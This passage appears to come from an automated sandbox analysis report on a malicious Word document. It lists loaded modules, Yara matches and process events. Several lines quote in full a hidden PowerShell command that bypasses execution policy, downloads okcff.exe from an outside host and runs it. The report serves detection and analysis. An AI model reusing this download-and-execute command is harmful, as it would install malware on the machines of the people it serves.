                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                    Source: notepad.exe, 00000018.00000002.700250949.0000000002E00000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: title field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: author field not present or empty
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drOLE document summary: edited time not present or 0
                    Source: 41.0.okcff.exe.400000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.7.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.7.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 41.0.okcff.exe.400000.9.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: System.Management.Automation.pdbBBa?p source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256 source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: protobuf-net.pdb source: okcff.exe, 00000009.00000002.621777237.0000000002543000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623349353.000000000334B000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.623303719.00000000032D3000.00000004.00000001.sdmp, okcff.exe, 00000009.00000002.628221985.00000000051D0000.00000004.00020000.sdmp
                    Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.437963370.0000000002C67000.00000004.00000040.sdmp, powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000005.00000002.439733945.0000000002954000.00000004.00000040.sdmp
                    Source: ~WRF{FEB62F73-6B26-43D9-9B3A-2E996B481DC3}.tmp.0.drInitial sample: OLE indicators vbamacros = False

                    Data Obfuscation:

                    barindex
                    Yara detected Costura Assembly LoaderShow sources
                    Source: Yara matchFile source: 9.2.okcff.exe.1e30000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.1e30000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.okcff.exe.35871d0.8.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.623662053.000000000356F000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621443805.00000000023AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.623703216.0000000003587000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621327809.00000000022E7000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.621033509.0000000001E30000.00000004.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: okcff.exe PID: 2656, type: MEMORYSTR
                    Suspicious powershell command line foundShow sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D863D pushfd ; ret 9_2_003D8641
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D7F95 pushad ; retn 001Ch9_2_003D7F99
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D7FF5 pushfd ; retn 001Ch9_2_003D8049
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_003D87E0 pushad ; ret 9_2_003D8849
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_0211EBEB push esp; retn 001Ch9_2_0211EBF5
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02181163 pushad ; ret 9_2_02181429
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02181464 pushad ; ret 9_2_02181429
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_02189840 push FFFFFF8Bh; ret 9_2_02189843
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_021ABD19 pushfd ; iretd 9_2_021ABD25
                    Source: C:\Users\user\AppData\Roaming\okcff.exeCode function: 9_2_054297B4 push 850FD83Bh; ret 9_2_054297C1
                    Source: okcff[1].exe.0.drStatic PE information: 0xF603599A [Sun Oct 17 00:04:42 2100 UTC]

                    Persistence and Installation Behavior:

                    barindex
                    Tries to download and execute files (via powershell)Show sources
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mitmar-pl.com/okcff.exe','C:\Users\user\AppData\Roaming\okcff.exe');Start-Process 'C:\Users\user\AppData\Roaming\okcff.exe'Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\okcff.exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okcff[1].exeJump to dropped file
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
